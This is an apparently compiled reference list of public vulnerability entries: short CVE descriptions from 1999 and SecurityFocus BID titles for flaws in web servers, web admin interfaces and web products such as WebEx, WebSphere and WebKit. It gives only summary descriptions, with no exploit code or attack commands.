[CVE-1999-1287] Vulnerability in Analog 3.0 and earlier allows remote attackers to read arbitrary files via the forms interface.
[CVE-1999-1277] BackWeb client stores the username and password in cleartext for proxy authentication in the Communication registry key, which could allow other local users to gain privileges by reading the password.
[CVE-1999-1264] WebRamp M3 router does not disable remote telnet or HTTP access to itself, even when access has been explicitly disabled.
[CVE-1999-1250] Vulnerability in CGI program in the Lasso application by Blue World, as used on WebSTAR and other servers, allows remote attackers to read arbitrary files.
[CVE-1999-1241] Internet Explorer, with a security setting below Medium, allows remote attackers to execute arbitrary commands via a malicious web page that uses the FileSystemObject ActiveX object.
[CVE-1999-1207] Buffer overflow in web-admin tool in NetXRay 2.6 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP request.
[CVE-1999-1206] SystemSoft SystemWizard package in HP Pavilion PC with Windows 98, and possibly other platforms and operating systems, installs two ActiveX controls that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via a malicious web page that references (1) the Launch control, or (2) the RegObj control.
[CVE-1999-1180] O'Reilly WebSite 1.1e and Website Pro 2.0 allows remote attackers to execute arbitrary commands via shell metacharacters in an argument to (1) args.cmd or (2) args.bat.
[CVE-1999-1175] Web Cache Control Protocol (WCCP) in Cisco Cache Engine for Cisco IOS 11.2 and earlier does not use authentication, which allows remote attackers to redirect HTTP traffic to arbitrary hosts via WCCP packets to UDP port 2048.
[CVE-1999-1167] Cross-site scripting vulnerability in Third Voice Web annotation utility allows remote users to read sensitive data and generate fake web pages for other Third Voice users by injecting malicious Javascript into an annotation.
[CVE-1999-1157] Tcpip.sys in Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service via an ICMP Subnet Mask Address Request packet, when certain multiple IP addresses are bound to the same network interface.
[CVE-1999-1155] LakeWeb Mail List CGI script allows remote attackers to execute arbitrary commands via shell metacharacters in the recipient email address.
[CVE-1999-1154] LakeWeb Filemail CGI script allows remote attackers to execute arbitrary commands via shell metacharacters in the recipient email address.
[CVE-1999-1128] Internet Explorer 3.01 on Windows 95 allows remote malicious web sites to execute arbitrary commands via a .isp file, which is automatically downloaded and executed without prompting the user.
[CVE-1999-1125] Oracle Webserver 2.1 and earlier runs setuid root, but the configuration file is owned by the oracle account, which allows any local or remote attacker who obtains access to the oracle account to gain privileges or modify arbitrary files by modifying the configuration file.
[CVE-1999-1124] HTTP Client application in ColdFusion allows remote attackers to bypass access restrictions for web pages on other ports by providing the target page to the mainframeset.cfm application, which requests the page from the server, making it look like the request is coming from the local host.
[CVE-1999-1110] Windows Media Player ActiveX object as used in Internet Explorer 5.0 returns a specific error code when a file does not exist, which allows remote malicious web sites to determine the existence of files on the client.
[CVE-1999-1093] Buffer overflow in the Window.External function in the JScript Scripting Engine in Internet Explorer 4.01 SP1 and earlier allows remote attackers to execute arbitrary commands via a malicious web page.
[CVE-1999-1087] Internet Explorer 4 treats a 32-bit number ("dotless IP address") in a URL as the hostname instead of an IP address, which causes IE to apply Local Intranet Zone settings to the resulting web page, allowing remote malicious web servers to conduct unauthorized activities by using URLs that contain the dotless IP address for their server.
[CVE-1999-1083] Directory traversal vulnerability in Jana proxy web server 1.45 allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-1999-1082] Directory traversal vulnerability in Jana proxy web server 1.40 allows remote attackers to read arbitrary files via a "......" (modified dot dot) attack.
[CVE-1999-1081] Vulnerability in files.pl script in Novell WebServer Examples Toolkit 2 allows remote attackers to read arbitrary files.
[CVE-1999-1074] Webmin before 0.5 does not restrict the number of invalid passwords that are entered for a valid username, which could allow remote attackers to gain privileges via brute force password cracking.
[CVE-1999-1073] Excite for Web Servers (EWS) 1.1 records the first two characters of a plaintext password in the beginning of the encrypted password, which makes it easier for an attacker to guess passwords via a brute force or dictionary attack.
[CVE-1999-1072] Excite for Web Servers (EWS) 1.1 allows local users to gain privileges by obtaining the encrypted password from the world-readable Architext.conf authentication file and replaying the encrypted password in an HTTP request to AT-generated.cgi or AT-admin.cgi.
[CVE-1999-1071] Excite for Web Servers (EWS) 1.1 installs the Architext.conf authentication file with world-writeable permissions, which allows local users to gain access to Excite accounts by modifying the file.
[CVE-1999-1068] Oracle Webserver 2.1, when serving PL/SQL stored procedures, allows remote attackers to cause a denial of service via a long HTTP GET request.
[CVE-1999-1067] SGI MachineInfo CGI program, installed by default on some web servers, prints potentially sensitive system status information, which could be used by remote attackers for information gathering activities.
[CVE-1999-1016] Microsoft HTML control as used in (1) Internet Explorer 5.0, (2) FrontPage Express, (3) Outlook Express 5, and (4) Eudora, and possibly others, allows remote malicious web site or HTML emails to cause a denial of service (100% CPU consumption) via large HTML form fields such as text inputs in a table cell.
[CVE-1999-1006] Groupwise web server GWWEB.EXE allows remote attackers to determine the real path of the web server via the HELP parameter.
[CVE-1999-1005] Groupwise web server GWWEB.EXE allows remote attackers to read arbitrary files with .htm extensions via a .. (dot dot) attack using the HELP parameter.
[CVE-1999-0982] The Sun Web-Based Enterprise Management (WBEM) installation script stores a password in plaintext in a world readable file.
[CVE-1999-0953] WWWBoard stores encrypted passwords in a password file that is under the web root and thus accessible by remote attackers.
[CVE-1999-0944] IBM WebSphere ikeyman tool uses weak encryption to store a password for a key database that is used for SSL connections.
[CVE-1999-0943] Buffer overflow in OpenLink 3.2 allows remote attackers to gain privileges via a long GET request to the web configurator.
[CVE-1999-0933] TeamTrack web server allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-1999-0929] Novell NetWare with Novell-HTTP-Server or YAWN web servers allows remote attackers to conduct a denial of service via a large number of HTTP GET requests.
[CVE-1999-0928] Buffer overflow in SmartDesk WebSuite allows remote attackers to cause a denial of service via a long URL.
[CVE-1999-0916] WebTrends software stores account names and passwords in a file which does not have restricted access permissions.
[CVE-1999-0915] URL Live! web server allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-1999-0897] iChat ROOMS Webserver allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-1999-0885] Alibaba web server allows remote attackers to execute commands via a pipe character in a malformed URL.
[CVE-1999-0883] Zeus web server allows remote attackers to read arbitrary files by specifying the file name in an option to the search engine.
[CVE-1999-0882] Falcon web server allows remote attackers to determine the absolute path of the web root via long file names.
[CVE-1999-0881] Falcon web server allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-1999-0869] Internet Explorer 3.x to 4.01 allows a remote attacker to insert malicious content into a frame of another web site, aka frame spoofing.
[CVE-1999-0858] Internet Explorer 5 allows a remote attacker to modify the IE client's proxy configuration via a malicious Web Proxy Auto-Discovery (WPAD) server.
[CVE-1999-0852] IBM WebSphere sets permissions that allow a local user to modify a deinstallation script or its data files stored in /usr/bin.
[CVE-1999-0844] Denial of service in MDaemon WorldClient and WebConfig services via a long URL.
[CVE-1999-0829] HP Secure Web Console uses weak encryption.
[CVE-1999-0771] The web components of Compaq Management Agents and the Compaq Survey Utility allow a remote attacker to read arbitrary files via a .. (dot dot) attack.
[CVE-1999-0710] The Squid package in Red Hat Linux 5.2 and 6.0, and other distributions, installs cachemgr.cgi in a public web directory, which allows remote attackers to use it as an intermediary to connect to other systems.
[CVE-1999-0699] The Bluestone Sapphire web server allows session hijacking via easily guessable session IDs.
[CVE-1999-0695] The Sybase PowerDynamo personal web server allows attackers to read arbitrary files through a .. (dot dot) attack.
[CVE-1999-0677] The WebRamp web administration utility has a default password.
[CVE-1999-0656] The ugidd RPC interface, by design, allows remote attackers to enumerate valid usernames by specifying arbitrary UIDs that ugidd maps to local user and group names.
[CVE-1999-0610] An incorrect configuration of the Webcart CGI program could disclose private information.
[CVE-1999-0607] quikstore.cgi in QuikStore shopping cart stores quikstore.cfg under the web document root with insufficient access control, which allows remote attackers to obtain the cleartext administrator password and gain privileges.
[CVE-1999-0604] An incorrect configuration of the WebStore 1.0 shopping cart CGI program "web_store.cgi" could disclose private information.
[CVE-1999-0537] A configuration in a web browser such as Internet Explorer or Netscape Navigator allows execution of active content such as ActiveX, Java, Javascript, etc.
[CVE-1999-0474] The ICQ Webserver allows remote attackers to use .. to access arbitrary files outside of the user's personal directory.
[CVE-1999-0469] Internet Explorer 5.0 allows window spoofing, allowing a remote attacker to spoof a legitimate web site and capture information from the client.
[CVE-1999-0467] The Webcom CGI Guestbook programs wguest.exe and rguest.exe allow a remote attacker to read arbitrary files using the "template" parameter.
[CVE-1999-0440] The byte code verifier component of the Java Virtual Machine (JVM) allows remote execution through malicious web pages.
[CVE-1999-0438] Remote attackers can perform a denial of service in WebRamp systems by sending a malicious UDP packet to port 5353, changing its IP address.
[CVE-1999-0437] Remote attackers can perform a denial of service in WebRamp systems by sending a malicious string to the HTTP port.
[CVE-1999-0412] In IIS and other web servers, an attacker can attack commands as SYSTEM if the server is running as SYSTEM and loading an ISAPI extension.
[CVE-1999-0408] Files created from interactive shell sessions in Cobalt RaQ microservers (e.g. .bash_history) are world readable, and thus are accessible from the web server.
[CVE-1999-0395] A race condition in the BackWeb Polite Agent Protocol allows an attacker to spoof a BackWeb server.
[CVE-1999-0386] Microsoft Personal Web Server and FrontPage Personal Web Server in some Windows systems allows a remote attacker to read files on the server by using a nonstandard URL.
[CVE-1999-0379] Microsoft Taskpads allows remote web sites to execute commands on the visiting user's machine via certain methods that are marked as Safe for Scripting.
[CVE-1999-0375] Buffer overflow in webd in Network Flight Recorder (NFR) 2.0.2-Research allows remote attackers to execute commands.
[CVE-1999-0360] MS Site Server 2.0 with IIS 4 can allow users to upload content, including ASP, to the target web site, thus allowing them to execute commands remotely.
[CVE-1999-0347] Internet Explorer 4.01 allows remote attackers to read local files and spoof web pages via a "%01" character in an "about:" Javascript URL, which causes Internet Explorer to use the domain specified after the character.
[CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
[CVE-1999-0286] In some NT web servers, appending a space at the end of a URL may allow attackers to read source code for active pages.
[CVE-1999-0283] The Java Web Server would allow remote users to obtain the source code for CGI programs.
[CVE-1999-0279] Excite for Web Servers (EWS) allows remote command execution via shell metacharacters.
[CVE-1999-0268] MetaInfo MetaWeb web server allows users to upload, execute, and read scripts.
[CVE-1999-0239] Netscape FastTrack Web server lists files when a lowercase "get" command is used instead of an uppercase GET.
[CVE-1999-0235] Buffer overflow in NCSA WebServer (1.4.1 and below) gives remote access.
[CVE-1999-0232] Buffer overflow in NCSA WebServer (version 1.5c) gives remote access.
[CVE-1999-0222] Denial of service in Cisco IOS web server allows attackers to reboot the router using a long URL.
[CVE-1999-0196] websendmail in Webgais 1.0 allows a remote user to access arbitrary files and execute arbitrary code via the receiver parameter ($VAR_receiver variable).
[CVE-1999-0178] Buffer overflow in the win-c-sample program (win-c-sample.exe) in the WebSite web server 1.1e allows remote attackers to execute arbitrary code via a long query string.
[CVE-1999-0177] The uploader program in the WebSite web server allows a remote attacker to execute arbitrary programs.
[CVE-1999-0176] The Webgais program allows a remote user to execute arbitrary commands.
[CVE-1999-0175] The convert.bas program in the Novell web server allows remote attackers to read any file on the system that is internally accessible by the web server.
[CVE-1999-0173] FormMail CGI program can be used by web servers other than the host server that the program resides on.
[CVE-1999-0151] The SATAN session key may be disclosed if the user points the web browser to other sites, possibly allowing root access.
[CVE-1999-0146] The campas CGI program provided with some NCSA web servers allows an attacker to execute arbitrary commands via encoded carriage return characters in the query string, as demonstrated by reading the password file.
[CVE-1999-0045] List of arbitrary files on Web host via nph-test-cgi script.
[CVE-1999-0039] webdist CGI program (webdist.cgi) in SGI IRIX allows remote attackers to execute arbitrary commands via shell metacharacters in the distloc parameter.
[CVE-1999-0031] JavaScript in Internet Explorer 3.x and 4.x, and Netscape 2.x, 3.x and 4.x, allows remote attackers to monitor a user's web activities, aka the Bell Labs vulnerability.
[CVE-1999-0012] Some web servers under Microsoft Windows allow remote attackers to bypass access restrictions for files with long file names.
SecurityFocus - https://www.securityfocus.com/bid/:
[103092] Juniper Junos J-Web Interface CVE-2018-0001 Remote Code Execution Vulnerability
[100168] SAP Customer Relationship Management (CRM) WebClient User Interface SQL Injection Vulnerability
[92187] Centreon Web Interface Remote Command Execution Vulnerability
[91263] Ceragon FibeAir IP-10 Web Interface Authentication Bypass Vulnerability
[87283] Winamp Web Interface CVE-2006-6512 Directory Traversal Vulnerability
[87272] web interface CVE-2006-6454 Remote Security Vulnerability
[82407] SNMP/Web Interface Command Injection and Information Disclosure Vulnerabilities
[78736] Cisco DPC3939 (XB3) Router Administrative Web Interface Command Injection Vulnerability
[78288] Enigma2 Webinterface CVE-2012-1025 Directory Traversal Vulnerability
[78281] Enigma2 Webinterface CVE-2012-1024 Directory Traversal Vulnerability
[74936] Freebox OS Web interface Cross Site Request Forgery and Cross Site Scripting Vulnerabilities
[74524] WebKit CVE-2015-1156 User Interface URI Spoofing Vulnerability
[74256] Cisco Unified MeetingPlace Administrative Web Interface Cross Site Scripting Vulnerability
[74033] Barracuda Web Interface Arbitrary Command Injection Vulnerability
[72339] D-Link DSL-2740R Web Interface Remote Poisoning Vulnerability
[69762] Airties Air6372SO Modem Web Interface 'top.html' Cross Site Scripting Vulnerability
[68847] CUPS Web Interface CVE-2014-5031 Incomplete Fix Local Privilege Escalation Vulnerability
[68846] CUPS Web Interface CVE-2014-5030 Incomplete Fix Local Privilege Escalation Vulnerability
[68842] CUPS Web Interface CVE-2014-5029 Incomplete Fix Local Privilege Escalation Vulnerability
[68788] CUPS Web Interface CVE-2014-3537 Local Privilege Escalation Vulnerability
[67178] NETGEAR DGN2200 ADSL Router Web Interface HTML Injection Vulnerability
[66788] CUPS Web Interface Cross Site Scripting Vulnerability
[65227] Cisco Identity Services Engine HTTP Control Interface for NAC Web Cross Site Scripting Vulnerability
[65217] OTRS Customer Web Interface Cross Site Request Forgery Vulnerability
[65108] Mediatrix 4402 Web Management Interface 'login' Page Cross Site Scripting Vulnerability
[64429] Cumin Web Interface Multiple Cross Site Request Forgery Vulnerabilities
[64425] Cumin Web Interface Cross Site Scripting Vulnerability
[64374] Icinga Web Interface CVE-2013-7106 Multiple Unspecified Buffer Overflow Vulnerabilities
[63698] RUCKUS WIRELESS ZoneDirector Guest Pass Provisioning Web Interface HTML Injection Vulnerability
[62767] IBM InfoSphere Information Server Web Console Interface Clickjacking Vulnerability
[62540] HP ArcSight Enterprise Security Manager Management Web Interface Cross Site Scripting Vulnerability
[62098] Supermicro IPMI Web Interface Unspecified Remote Privilege Escalation Vulnerability
[62097] Supermicro IPMI Web Interface Unspecified Remote Arbitrary Shell Command Injection
[62094] Supermicro IPMI Web Interface Multiple Stack-Based Buffer Overflow Vulnerabilities
[58932] AirDroid Web Interface CVE-2013-0134 Cross Site Scripting Vulnerability
[54390] SMC Networks SMC8024L2 Switch Web Interface Authentication Bypass Vulnerability
[54385] Cisco TelePresence Recording Server Web Interface Remote Command Injection Vulnerability
[54253] Novell Groupwise WebAccess 'User.interface' Parameter Directory Traversal Vulnerability
[54007] PacketFence 'Web Admin Guest Management' Interface Unspecified Cross Site Scripting Vulnerability
[52141] Cisco Small Business SRP500 Series Web Interface CVE-2012-0363 Command Injection Vulnerability
[51085] Websense Triton Report Management Interface Cross Site Scripting Vulnerability
[50978] HomeSeer HS2 Web Interface Multiple Security Vulnerabilities
[50841] Virtual Vertex Muster Web Interface Directory Traversal Vulnerability
[50495] Cisco Small Business SRP500 Series Appliances Web Interface Remote Command Injection Vulnerability
[50097] Supermicro IPMI Web Interface Multiple Security Bypass Vulnerabilities
[48812] Cisco SA 500 Series Appliances Web Management Interface (CVE-2011-2546) SQL Injection Vulnerability
[48810] Cisco SA 500 Series Appliances Web Management Interface Remote Command Injection Vulnerability
[48063] Anymacro Mail System Web Interface Directory Traversal Vulnerability
[48010] AIDeX Mini-Webserver Chat Interface 'Nickname' Field HTML Injection Vulnerability
[47988] Cisco RVS4000/WRVS4400N Web Management Interface Information Disclosure Vulnerability
[47984] Cisco RVS4000/WRVS4400N Web Management Interface Remote Command Injection Vulnerability
[47706] ZyXEL ZyWALL USG Appliances Web Interface Security Bypass Vulnerability
[47575] snom VoIP Phone Web Interface Cross Site Scripting And Information Disclosure Vulnerabilities
[46537] Mutare Software Enabled VoiceMail (EVM) Web Interface Cross Site Request Forgery Vulnerabilities
[46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
[45291] Citrix Web Interface Unspecified Cross-Site Scripting Vulnerability
[44926] Cisco Unified Videoconferencing Web Interface Weak Session Cookie Session Hijacking Vulnerability
[43130] snom VoIP Phone Web Interface HTTP Request Authentication Bypass Vulnerability
[41661] D-Link DAP-1160 Web Administration Interface 'formFilter()' Function Buffer Overflow Vulnerability
[41389] Sun Java System Web Server Admin Interface Denial of Service Vulnerability
[41226] Multiple Snare Agents Web Interface Cross Site Request Forgery Vulnerability
[41222] D-Link DAP-1160 Web Administration Interface Security Bypass Vulnerability
[41068] WebKit User Interface Cross Domain Spoofing Vulnerability
[40897] CUPS Web Interface Information Disclosure Vulnerability
[40889] CUPS Web Interface Unspecified Cross Site Request Forgery Vulnerability
[40771] snom VoIP Phone Firmware Web Interface Remote Security Bypass Vulnerability
[39763] NIBE Heat Pump Web Interface 'exec.cgi' Script Remote Code Execution Vulnerability
[39608] Webmoney Web Merchant Interface Component for Joomla! Local File Include Vulnerability
[38838] Citrix Web Interface Source Code Information Disclosure Vulnerability
[38376] Computer Associates eHealth Performance Manager Web Interface Cross-Site Scripting Vulnerability
[37385] IBM Rational ClearQuest CQWeb Interface Password Information Disclosure Vulnerability
[36199] VMware Studio Virtual Appliance Web Interface File Upload Directory Traversal Vulnerability
[36177] Xerox WorkCentre Web Services Extensible Interface Platform Unauthorized Access Vulnerability
[35742] DD-WRT Web Management Interface Remote Arbitrary Shell Command Injection Vulnerability
[34761] Citrix Web Interface Unspecified Cross-Site Scripting Vulnerability
[34698] Home Web Server Graphical User Interface Remote Denial Of Service Vulnerability
[34126] VLC Media Player Web Interface 'input' Parameter Remote Buffer Overflow Vulnerability
[32317] Cobbler Web Interface Kickstart Template Remote Privilege Escalation Vulnerability
[32156] Nagios Web Interface Privilege Escalation Vulnerability
[31943] Citrix Web Interface Security Bypass Vulnerability
[30919] Dreambox Web Interface URI Remote Denial of Service Vulnerability
[29922] Novell GroupWise WebAccess Simple Interface Cross Site Scripting Vulnerability
[29691] Xerox WorkCentre Web Services Extensible Interface Platform Unauthorized Access Vulnerability
[28684] Avaya Communication Manager Web Interface Multiple Input Validation Vulnerabilities
[28639] F5 BIG-IP Web Management Interface 'NEW_VALUE' Parameter Remote Code Injection Vulnerability
[28151] F5 BIG-IP Web Management Interface Console HTML Injection Vulnerability
[28122] Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability
[27813] Sophos Email Appliance Web Interface Multiple Cross-Site Scripting Vulnerabilities
[27720] F5 BIG-IP Web Management Interface Cross-Site Request Forgery Vulnerability
[26933] Citrix Web Interface On-line Help Cross-Site Scripting Vulnerability
[26381] Cerberus FTP Server Web Interface Cross Site Scripting Vulnerability
[25678] Axis Communications 207W Network Camera Web Interface Vulnerabilities
[25505] Aztech DSL600EU Router Web Interface IP Spoofing Vulnerability
[24879] Webmatic Administration Interface Security Bypass Vulnerability
[24388] Packeteer PacketShaper Web Interface Remote Denial of Service Vulnerability
[23935] TeamSpeak Server WebAdmin Interface Privilege Escalation Vulnerability
[21539] Winamp Web Interface Multiple Remote Vulnerabilities
[20836] J-Owamp Web Interface Jowamp_ShowPage.PHP Remote File Include Vulnerability
[20124] Cisco IPS/IDS Web Administration Interface Denial Of Service Vulnerability
[18704] Cisco Access Point Web Interface Authorization Bypass Vulnerability
[15798] Nortel SSL VPN Web Interface Input Validation Vulnerability
[15081] GFI MailSecurity for Exchange/SMTP Web Interface Remote Buffer Overflow Vulnerability
[15001] Symantec AntiVirus Scan Engine Web Service Administrative Interface Buffer Overflow Vulnerability
[14372] Siemens Santis 50 Wireless Router Web Interface Denial Of Service Vulnerability
[12984] SonicWALL SOHO Web Interface Multiple Remote Input Validation Vulnerabilities
[12968] MaxWebPortal Events And Links Interface Multiple Input Validation Vulnerabilities
[12682] Mitel 3300 Integrated Communications Platform Web Interface Authentication Bypass Vulnerability
[12142] ZyXEL B-240 Wireless Ethernet Adapter Web Interface Remote Cross-Site Scripting Vulnerability
[12136] Macallan Mail Solution Web Interface Authentication Bypass Variant Vulnerability
[11779] IPCop Web Administration Interface Proxy Log HTML Injection Vulnerability
[11232] Pinnacle ShowCenter Web Interface Skin Denial Of Service Vulnerability
[10605] ZaireWeb Solutions Newsletter ZWS Administrative Interface Authentication Bypass Vulnerability
[10601] 3Com SuperStack Switch Web Interface Denial Of Service Vulnerability
[10490] U.S. Robotics Broadband Router 8003 Administration Web Interface Insecure Password Vulnerability
[10426] 3Com OfficeConnect Remote 812 ADSL Router Web Interface Authentication Bypass Vulnerability
[9646] Macallan Mail Solution Web Interface Authentication Bypass Vulnerability
[9460] WebTrends Reporting Center Management Interface Path Disclosure Vulnerability
[9384] Cisco Personal Assistant Web Interface User Password Bypass Vulnerability
[9140] IBM Directory Server Web Administration Interface Cross-Site Scripting Vulnerability
[9033] FortiGate Firewall Web Interface Cross-Site Scripting Vulnerabilities
[8946] Mldonkey Web Interface Error Message Cross-site Scripting Vulnerability
[8673] NetUp UTM Web Interface Local Privilege Escalation Vulnerability
[8672] NetUP UTM Web Interface utm_stat Script SQL Injection Vulnerability
[8671] NetUP UTM Web Interface Session ID SQL Injection Vulnerability
[8578] FloosieTek FTGatePro WebAdmin Interface Information Disclosure Weakness
[8096] Axis Print Server Web Interface Denial Of Service Vulnerability
[7751] Zeus Web Server Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability
[7675] IISProtect Web Administration Interface SQL Injection Vulnerability
[7395] Oracle9iAS Web Cache Administration Interface Plaintext Password Vulnerability
[7166] Netgear ProSafe VPN Firewall Web Interface Login Denial Of Service Vulnerability
[6842] Abyss Web Server Administrative Interface Failed Login Recording Weakness
[6824] Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability
[6144] Zeus Web Server Admin Interface Cross Site Scripting Vulnerability
[5780] HP Compaq Insight Manager Web Interface Cross-Site Scripting Vulnerability
[5616] Cisco VPN 3000 Series Concentrator Web Interface Information Disclosure Vulnerability
[5329] SEH IC9 Pocket Print Server Web Administrative Interface Password Denial Of Service Vulnerability
[4942] Red-M 1050AP Lan Access Point Web Administration Interface Denial of Service Vulnerability
[4798] Cisco VoIP Phone Web Interface System Memory Contents Information Leakage Vulnerability
[3375] NAI PGP Keyserver Web Administration Interface Authentication Bypassing Vulnerability
[1319] Computalynx CMail Web Interface CPU Consumption DoS Vulnerability
[1318] Computalynx CMail Web Interface Buffer Overflow Vulnerability
[104564] McAfee Web Gateway CVE-2018-6667 Authentication Bypass Vulnerability
[104524] Polycom RealPresence Web Suite CVE-2018-12592 Information Disclosure Vulnerability
[104508] IBM WebSphere Application Server CVE-2017-1681 Local Information Disclosure Vulnerability
[104507] IBM WebSphere Application Server CVE-2017-1741 Information Disclosure Vulnerability
[104488] IBM WebSphere MQ CVE-2018-1419 Denial of Service Vulnerability
[104421] Cisco WebEx CVE-2018-0356 Cross Site Scripting Vulnerability
[104420] Cisco WebEx CVE-2018-0357 Cross Site Scripting Vulnerability
[104417] Cisco Web Security Appliance CVE-2018-0353 Remote Security Bypass Vulnerability
[104396] EMC RSA Web Threat Detection CVE-2018-1252 SQL Injection Vulnerability
[104359] Microsoft Windows WebDAV CVE-2018-8175 Denial of Service Vulnerability
[104301] IBM WebSphere Application Server CVE-2013-3024 Local Command Injection Vulnerability
[104277] D-Link DIR-629-B1 'weblogin_log' Function Buffer Overflow Vulnerability
[104190] Advantech WebAccess ICSA-18-135-01 Multiple Security Vulnerabilities
[104134] IBM WebSphere Application Server CVE-2017-1743 Information Disclosure Vulnerability
[104128] Multiple Cisco WebEx Network Recording Players CVE-2018-0287 Remote Code Execution Vulnerability
[104091] Cisco WebEx Recording Format Player CVE-2018-0288 Information Disclosure Vulnerability
[104073] Multiple Cisco WebEx Network Recording Players CVE-2018-0264 Remote Code Execution Vulnerability
[103972] Advantech WebAccess HMI Designer Multiple Security Vulnerabilities
[103961] WebKit Multiple Memory Corruption Vulnerabilities
[103921] Cisco WebEx Connect IM CVE-2018-0276 Cross Site Scripting Vulnerability
[103920] Multiple Cisco WebEx Products CVE-2018-0112 Remote Code Execution Vulnerability
[103800] Oracle WebCenter Sites CVE-2018-2791 Remote Security Vulnerability
[103797] Oracle WebCenter Content CVE-2018-2828 Remote Security Vulnerability
[103776] Oracle WebLogic Server CVE-2018-2628 Remote Security Vulnerability
[103497] IBM WebSphere Application Server CVE-2017-1788 Spoofing Vulnerability
[103430] Fortinet Fortiweb CVE-2017-14191 Access Bypass Vulnerability
[103407] Cisco Web Security Appliance CVE-2018-0087 Authentication Bypass Vulnerability
[103396] OSIsoft PI Web API Privilege Escalation and Cross Site Scripting Vulnerabilities
[103168] IBM WebSphere Portal CVE-2018-1416 Cross Site Scripting Vulnerability
[103137] WebKit CVE-2017-7160 Memory Corruption Vulnerability
[103089] ABB netCADOPS Web Application CVE-2018-5477 Information Disclosure Vulnerability
[103006] SAP ABAP File Interface CVE-2018-2367 Directory Traversal Vulnerability
[103002] SAP Customer Relationship Management (CRM) WebClient UI Cross Site Scripting Vulnerability
[102973] IBM WebSphere Portal CVE-2018-1401 Cross Site Scripting Vulnerability
[102911] IBM WebSphere Application Server CVE-2017-1731 Remote Privilege Escalation Vulnerability
[102909] CODESYS Web Server CVE-2018-5440 Stack Based Buffer Overflow Vulnerability
[102896] IBM DOORS Web Access CVE-2017-1545 Local Access Bypass Vulnerability
[102890] IBM Rational DOORS Web Access CVE-2017-1540 Cross Site Scripting Vulnerability
[102872] IBM Rational DOORS Web Access CVE-2017-1515 Information Disclosure Vulnerability
[102867] IBM Rational DOORS Web Access CVE-2017-1516 Clickjacking Vulnerability
[102862] IBM Rational DOORS Web Access CVE-2017-1563 Cross Site Scripting Vulnerability
[102829] HP Web Jetadmin CVE-2017-2742 Unspecified Denial of Service Vulnerability
[102781] Advantech WebAccess/SCADA ICSA-18-023-01 Directory Traversal and SQL Injection Vulnerabilities
[102778] WebKit CVE-2018-4089 Memory Corruption Vulnerability
[102775] WebKit Multiple Memory Corruption Vulnerabilities
[102773] Cisco WebEx Meetings Server CVE-2018-0110 Remote Security Vulnerability
[102735] Cisco Web Security Appliance CVE-2018-0093 Cross Site Scripting Vulnerability
[102723] Cisco WebEx Meetings Server CVE-2018-0111 Information Disclosure Vulnerability
[102722] Cisco WebEx Meetings Server CVE-2018-0109 Information Disclosure Vulnerability
[102720] Cisco WebEx Meetings Server CVE-2018-0108 XML External Entity Information Disclosure Vulnerability
[102573] Oracle WebCenter Sites CVE-2018-2584 Remote Security Vulnerability
[102567] Oracle WebLogic Server CVE-2018-2625 Remote Security Vulnerability
[102550] Oracle WebCenter Content CVE-2018-2713 Remote Security Vulnerability
[102545] Oracle WebCenter Content CVE-2018-2596 Remote Security Vulnerability
[102541] Oracle WebCenter Content CVE-2018-2564 Remote Security Vulnerability
[102501] IBM WebSphere Portal CVE-2018-1361 Cross Site Scripting Vulnerability
[102484] RubyGems 'delayed_job_web' CVE-2017-12097 Cross Site Scripting Vulnerability
[102479] IBM WebSphere MQ CVE-2017-1612 Local Privilege Escalation Vulnerability
[102444] Oracle WebLogic Server CVE-2017-10334 Remote Security Vulnerability
[102442] Oracle WebLogic Server CVE-2017-10352 Remote Security Vulnerability
[102424] Advantech WebAccess ICSA-18-004-02 Multiple Security Vulnerabilities
[102382] Cisco WebEx Network Recording Player CVE-2018-0104 Remote Code Execution Vulnerability
[102369] Cisco WebEx Network Recording Player CVE-2018-0103 Local Buffer Overflow Vulnerability
[102339] Webmin 'custom/run.cgi' Cross Site Scripting Vulnerability
[102317] ImageMagick 'coders/webp.c' Stack Buffer Overflow Vulnerability
[102281] IBM WebSphere Portal CVE-2017-1698 Unspecified Information Disclosure Vulnerability
[102255] IBM WebSphere Portal CVE-2017-1423 Information Disclosure Vulnerability
[102207] Python 'Lib/webbrowser.py' Remote Command Execution Vulnerability
[102186] Cisco WebEx Network Recording Player CVE-2017-12359 Buffer Overflow Vulnerability
[102181] WebKit Multiple Memory Corruption Vulnerabilities
[102042] IBM WebSphere MQ CVE-2017-1341 Unauthorized Access Vulnerability
[102017] Multiple Cisco WebEx Products Multiple Security Vulnerabilities
[102007] ZKTeco ZKTime Web CVE-2017-17056 Cross Site Request Forgery Vulnerability
[102006] ZKTeco ZKTime Web CVE-2017-17057 Cross Site Scripting Vulnerability
[102001] Cisco WebEx Network Recording Player CVE-2017-12360 Denial of Service Vulnerability
[102000] Cisco WebEx Meetings Server CVE-2017-12363 Remote Security Bypass Vulnerability
[101999] Cisco WebEx Event Center CVE-2017-12365 Information Disclosure Vulnerability
[101985] Cisco WebEx Meeting Center CVE-2017-12297 URL Redirection Vulnerability
[101984] Cisco WebEx Meeting Center CVE-2017-12366 Cross Site Scripting Vulnerability
[101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
[101953] Fortinet FortiWebManager CVE-2017-14189 Security Bypass Vulnerability
[101932] Cisco Web Security Appliance CVE-2017-12303 Remote Security Bypass Vulnerability
[101916] Fortinet Fortiweb CVE-2017-7736 HTML Injection Vulnerability
[101894] IBM WebSphere Commerce CVE-2017-1484 Information Disclosure Vulnerability
[101793] Roundcube Webmail CVE-2017-16651 Information Disclosure Vulnerability
[101685] Advantech WebAccess Multiple Remote Code Execution Vulnerabilities
[101654] Cisco WebEx Meetings Server CVE-2017-12294 Cross Site Scripting Vulnerability
[101651] Cisco WebEx Meetings Server CVE-2017-12295 Information Disclosure Vulnerability
[101492] Cisco WebEx Meetings Server CVE-2017-12293 Denial of Service Vulnerability
